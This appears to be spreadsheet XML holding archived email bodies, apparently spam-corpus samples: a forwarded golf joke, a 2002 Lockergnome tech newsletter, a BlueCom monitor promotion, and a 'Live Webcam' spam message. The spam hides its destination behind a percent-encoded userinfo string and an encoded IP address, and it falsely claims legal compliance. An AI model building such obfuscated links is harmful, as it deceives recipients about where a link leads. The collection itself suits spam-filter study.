 Forwarded-by: Rob Windsor &lt;windsor@warthog.com&gt;
 Forwarded-by: "Shirley Baer"
 Forwarded-by: cjw59068
 Forwarded-by: Joe &amp; Allie Greenough
 There were four buddies golfing and the first guy said, "I had to
 promise my wife that I would paint the whole outside of the house
 just to go golfing."
 The second guy said, "I promised my wife that I would remodel the
 kitchen for her."
 The third guy said, "You guys have it easy! I promised my wife that
 I would build her a new deck." They continued to play the hole.
 Then the first guy said to the fourth guy, "What did you have to
 promise your wife?"
 The fourth guy replied, "I didn't promise anything." All the guys
 were shocked, "How did you do it?!" He replied, "It's simple. I
 set the alarm clock for 5:30. Then I poked my wife and asked, 'Golf
 course or intercourse?' And she said, 'Wear your sweater.'"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Hi
</t>
  </si>
  <si>
    <t xml:space="preserve">Me and my friends have this brand new idea, a Live Webcam &lt;a href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31
 %30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%
 31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31
 %30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%3
 1%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%
 30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%
 31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%
 30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30
 %31@%34%2E%34%37%2E%39%36%2E%31%34%31/msga.html"&gt; Click Here &lt;a/&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font size="1"&gt;This is NOT SPAM - You have received this e-mail because 
 at one time or another you entered the weekly draw at one of
 our portals or FFA sites. We comply with all proposed and current laws 
 on commercial e-mail under (Bill s. 1618 TITLE III passed by the 105th 
 Congress).
  If you have received this e-mail in error, we apologize for the 
 inconvenience and ask that you remove yourself. 
 Click  &lt;a href="mailto:myscrotumhurts@yahoo.com"&gt;Here to Unsubscribe&lt;/a&gt;
 &lt;br&gt;
 cvstceuyxxkxgnxskjnc
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020717.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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&lt;a href="http://www.qksrv.net/click-471546-5802823" target="_top" &gt;
 &lt;img src="http://www.qksrv.net/image-471546-5802823" width="468" height="60" alt="DVD PictureShow" border="0"&gt;&lt;/a&gt;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07.17.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Why rely on BIND when you can get UltraDNS:&lt;/b&gt; UltraDNS increases Web site
 performance, reliability, and security all for as low as $1.00 a month.
 &lt;a href="http://servedby.advertising.com/click/site=64021/mnum=63759"&gt;Click here to find out more&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Brooklyn Bridge for sale! No kidding! The town of Brooklyn, 
 Iowa has a bridge that they are &lt;a 
 href="http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=174
 9445282"&gt;selling on Ebay&lt;/a&gt;, so if you have a need for such 
 a structure, or just want to have the right to say you 
 legitimately purchased the Brooklyn Bridge, here's your 
 opportunity! Seriously, this is not a prank!
 &lt;p&gt;Ever since I was down toward Des Moines last week and had 
 a cup-o-java with Jake at Starbucks, I've been craving 
 coffee. I can't see myself turning into a coffee junkie like 
 Chris, but it's just weird that this would happen, being 
 that my extent of coffee drinking has usually been limited 
 to the severe need for a quick morning wake-up or in an 
 effort to keep warm on cold mornings when out in the field 
 back in my Marine Corps days. 
 &lt;p&gt;As time has gone on, I've been trying to cut back on the 
 typical geek vices of sugar and caffeine, but I can't drink 
 coffee straight. It has to be sweet, and what's the point of 
 drinking coffee if there's no caffeine? Enter Splenda. An 
 artificial sweetener that has finally made it to Waterloo, 
 Iowa. Most of what Diana and I use sugar for has been 
 modified to use Splenda instead, with good results. 
 Hopefully this coffee thing is just a temporary kick like it 
 usually is. I have to brush my teeth after a cup or two from 
 the nasty breath. It's fun to test out the dragon-breath on 
 the cat to see just how bad it really is. If Bootes sniffs a 
 couple of times, it's not too bad, but if she instantly 
 recoils, time to employ the Sonicare for a couple of 
 minutes. See what you've started, Jake?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&lt;b&gt;Exchange Titanium Details Emerge&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/presspass/features/2002/jul02/07-15exchangeqa.asp"&gt;http://www.microsoft.com/presspass/features/2002/jul02/07-15exchangeqa.asp&lt;/a&gt;
 &lt;p&gt;Oracle recently announced their intention to compete 
 directly with Microsoft Exchange, even accepting Outlook as 
 an email client. In what seems like a direct response, we're 
 handed details of the 2003 release of Exchange Titanium. 
 I've always liked what Exchange can do, so I'm certainly 
 looking forward to seeing what the new features will be all 
 about, but I'm also interested in what Oracle will be 
 bringing to the table. Better email functionality, control 
 and security are the name of the game, whoever ends up being 
 the vendor of choice. Included in this Q&amp;A is a screenshot 
 of what Outlook may look like once Office 11 is released. 
 It's an interesting concept shot, showing some new ways they 
 plan to handle email views. It doesn't say anything for 
 Exchange functionality, but it's worth noting regardless.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Better Pocket PC Audio&lt;/b&gt;
 &lt;br&gt;Unearthed by David Spencer
 &lt;p&gt;&lt;a class="url" href="http://home.adelphia.net/~mdukette/downloads.html"&gt;http://home.adelphia.net/~mdukette/downloads.html&lt;/a&gt;
 &lt;p&gt;An open source project is bringing a different spin to 
 audio and video on Pocket PCs, and my first impression is... 
 cool! I like what they're working on here. I decided to wipe 
 out my Jornada yesterday, so I haven't done a direct 
 comparison between the iPaq 3870 and Jornada 565 for audio 
 quality using this player, which has an equalizer built-in, 
 but it definitely has potential judging from how it sounds 
 on the iPaq right out of the gate. Definitely give this a 
 peek if you're one of those that likes to play audio and 
 video on a Pocket PC. Quite a few different versions are 
 supported, so you should be able to find something 
 appropriate to your device.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q320278"&gt;Q320278 - WD: "The Custom Dictionary &lt;Filename&gt; Is Not Available " Error When You Use Portuguese (Brazilian) Proofing Tools (Q320278)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q313147"&gt;Q313147 - GetNtmsObjectAttribute Does Not Return Correct Size When the Buffer Is Too Small (Q313147)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q313317"&gt;Q313317 - A GPO "Register PTR Records" Setting of "Disabled" Is Ignored (Q313317)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310869"&gt;Q310869 - STOP Error When You Start Windows After You Connect a Scanner (Q310869)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310772"&gt;Q310772 - PCMCIA Device May Not Work in Windows XP (Q310772)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt;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&lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 OS X TIPS: Whether you're making the "switch" from Windows, upgrading 
 from a previous version of Mac OS, or just want some helpful tricks to make 
 using OS X easier, this ebook is for you. Jake cover's everything from user 
 management, to some Terminal basics, to how to navigate differences between 
 OS 9 and OS X. 
 &lt;a href="http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU6660735309&amp;AffIDC=AFF669529939"&gt;Get your copy today&lt;/a&gt;!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Where's Java?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1001-944053.html"&gt;http://news.com.com/2100-1001-944053.html&lt;/a&gt;
 &lt;p&gt;Three readers asked me about this very thing this week, 
 and it's something you should probably know about if you use 
 Windows XP. Microsoft didn't bundle the Java Virtual Machine 
 with Windows XP, and since the release of XP, the JVM has been avaialble via the 
 Windows Update site as a "convenience" to users. Part of Sun's legal
 complaints surrounding how Microsoft has handled Java was that Microsoft did not have the right to 
 distribute their implementation via the web, though 
 they did have licensing rights to include it with Windows. 
 So essentially, Microsoft has things backwards, as it seems. 
 Well, to avoid further web distribution arguments, Microsoft 
 has yanked the JVM from the Windows Update site and all 
 other areas of Microsoft's web site. Microsoft is still 
 planning to include Java with Windows XP Service Pack 1. 
 You'll have to plan for Java support accordingly, as SP1 is 
 still a ways off and you can't get it from Microsoft at this 
 point. If you need it for a new installation of Windows XP 
 in the short term, Sun will gladly provide you with &lt;a href="http://java.sun.com/getjava/download.html"&gt;their 
 own distibution&lt;/a&gt;. 
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Another Xeon Deal&lt;/b&gt;
 &lt;br&gt;Served up by Warren Dugas
 &lt;p&gt;&lt;a class="url" href="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?sku=C170-1032%20P"&gt;http://www.tigerdirect.com/applications/SearchTools/item-details.asp?sku=C170-1032%20P&lt;/a&gt;
 &lt;p&gt;I mentioned a really nice deal on Compaq Evo W6000 dual-
 Xeon workstations a few weeks back, which I know several of 
 you took advantage of, but the $1999 price tag likely scared 
 off many others. If you still want to get into a Xeon, check 
 this one out. TigerDirect is offering an Evo W8000 
 workstation with a single 1.7GHz processor, 18.2GB 15,000rpm U160 
 drive, 48x CD-ROM and licenses for both Windows 2000 Pro and 
 NT 4.0 Workstation for $699.99. Note that there is NO memory 
 and no video card included, so you'll have to scrounge those for 
 yourself, but it really is a pretty good deal, on the whole. 
 Also realize that these systems take RAMBUS memory, which 
 will add a bit of cost, so be sure you know what you're 
 getting - a wicked-fast workstation, to be sure! Expandability is also quite amazing with these machines.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href="http://www.lockergnome.com/issues/techspecialist/20020717.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020717.html&lt;/a&gt;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</si>
  <si>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Super Cool Monitor Deals!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----=c_8xk3gaozmp2il98g4_xq03eowmlk
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 Click here to see our promotion mail on monitors:
 http://www.bluecom.com/Promo/monitors_exp
 Best regards
 BlueCom Danmark A/S
 Worldwide IT Volume Distributor
 Blokken 11-13, DK-3460 Birkeroed, Denmark
 Phone: + 45 45 94 55 55, Fax: + 45 45 94 55 00
 Web: http://www.bluecom.com
 -----=c_8xk3gaozmp2il98g4_xq03eowmlk
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;title&gt;BlueCom promotion mail&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#333333" link=3D"#0000FF" vlink=3D"#0000FF" alink=3D"#0000FF"&gt;
 &lt;!-- styretabel --&gt;
 &lt;table align=3D"center" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;!-- navigation --&gt;
 &lt;table align=3D"center" width=3D"738" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 &lt;tr&gt;
 &lt;td colspan=3D"3" align=3D"right"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#333333"&gt;This mail has been sent to: fork@spamassassin.taint.org &lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1264"&gt;Click Here&lt;/a&gt; to unsubscribe.&lt;/font&gt;&lt;p&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"361" bgcolor=3D"#FFFFFF"&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1265"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/bc_cut270602_03.gif" width=3D"226" height=3D"53" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"170" bgcolor=3D"#FFFFFF"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/ibm_partners.jpg" width=3D"128" height=3D"53" border=3D"0" alt=3D""&gt;&lt;/td&gt;
 &lt;td align=3D"left" width=3D"207"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/bc_cut270602_07.gif" width=3D"207" height=3D"53" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/bc_cut270602_10.gif" width=3D"738" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table align=3D"center" width=3D"738" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" bgcolor=3D"#033262"&gt;
 &lt;tr&gt;
 &lt;td align=3D"left"&gt;
 &lt;table border=3D"0" cellspacing=3D"2" cellpadding=3D"2"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1265"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_home.gif" width=3D"39" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1266"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_aboutus.gif" width=3D"62" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1267"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_contact.gif" width=3D"63" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1268"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_products.gif" width=3D"63" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1269"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_terms.gif" width=3D"43" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1270"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_rma.gif" width=3D"32" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1271"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_jobs.gif" width=3D"36" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1272"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_faq.gif" width=3D"28" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1274"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_news.gif" width=3D"38" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1275"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_press.gif" width=3D"43" height=3D"13"  border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;a href=3D"http://ocms.ocms.dk/engine/redirectord.cfm?ID=3D1276"&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/btn_menu_site.gif" width=3D"32" height=3D"13" border=3D"0" alt=3D""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- navigation slut --&gt;
 &lt;br&gt;
 &lt;table align=3D"center" width=3D"738" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/banner.gif" border=3D"0" width=3D"738" height=3D"50" align=3D"bottom" alt=3D""&gt;&lt;p&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Indhold --&gt;
 &lt;table align=3D"center" width=3D"738" cellpadding=3D"5" cellspacing=3D"0" border=3D"0"&gt;
 &lt;!-- 1 --&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/tmx528black.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;BLUESOLUTIONS 15"  TFT Monitor&lt;br&gt;
 Black&lt;/b&gt; TMX528 (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 345.00&lt;/b&gt;&lt;br&gt;&amp;euro; 381,00&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"50"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/tft_t860.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;IBM T860 18,1" TFT Stealth Black&lt;/b&gt;&lt;br&gt;
 T4HB0DK (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 1,070.00&lt;/b&gt;&lt;br&gt;&amp;euro; 1.070,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D5&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/grayline.gif" border=3D"0" width=3D"728" height=3D"2" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- 2 --&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/hp72_17.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;HP 72 TCO 17"  Color Monitor&lt;/b&gt;&lt;br&gt;
 D8905ARR-ABB (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 144.00&lt;/b&gt;&lt;br&gt;&amp;euro; 149,00&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"50"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/hp72_17.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;HP 72 17"  Color Monitor &lt;/b&gt;&lt;br&gt;
 D8904ARR-ABB (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 144.00&lt;/b&gt;&lt;br&gt;&amp;euro; 148,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D5&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/grayline.gif" border=3D"0" width=3D"728" height=3D"2" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- 3 --&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/15tft_llt15v1.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;SHARP 15" TFT Monitor White&lt;/b&gt;&lt;br&gt;
 LL-T15V1 (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 335.00&lt;/b&gt;&lt;br&gt;&amp;euro; 345,00&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"50"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/lt541f_17.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;MAG 15" TFT Monitor White&lt;/b&gt;&lt;br&gt;
 LT-541F (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 299.00&lt;/b&gt;&lt;br&gt;&amp;euro; 311,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D5&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/grayline.gif" border=3D"0" width=3D"728" height=3D"2" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- 4 --&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/l1520_15tft.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;HP L1520 15"  LCD Multimedia&lt;br&gt;
 Monitor&lt;/b&gt; D5063MR (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 360.00&lt;/b&gt;&lt;br&gt;&amp;euro; 371,50&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"50"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/products/yakumo17.jpg" border=3D"0" width=3D"100" height=3D"100" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;td width=3D"250"&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;YAKUMO 17"  TFT Monitor White&lt;/b&gt;&lt;br&gt;
 LCZ-EOT-7C778-D (Retail)&lt;/font&gt;&lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica" size=3D"1" color=3D"#FF0000"&gt;&lt;b&gt;$ 495.00&lt;/b&gt;&lt;br&gt;&amp;euro; 519,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan=3D5&gt;&lt;img src=3D"http://www.bluecom.com/Promo/monitors/images/grayline.gif" border=3D"0" width=3D"728" height=3D"2" align=3D"bottom" alt=3D""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;table align=3D"center" width=3D"738" border=3D"0" cellpadding=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;P/N:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;Description:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;Packing:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;Price (USD):&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&lt;b&gt;Price (EUR):&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor=3D"#eeeeee"&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;TMX528&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;BLUESOLUTIONS 15" TFT Monitor White&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 345.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 381,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;04N7160&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;IBM P260 21" FD Trinitron&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;Retail&lt;/font&gt;&lt;/td&gt; 
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;$ 599.00&lt;/font&gt;&lt;/td&gt;
 &lt;td align=3Dright&gt;&lt;font face=3D"Verdana, Arial, Helvetica" color=3D"#333333" size=3D"1"&gt;&amp;euro; 611,00&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
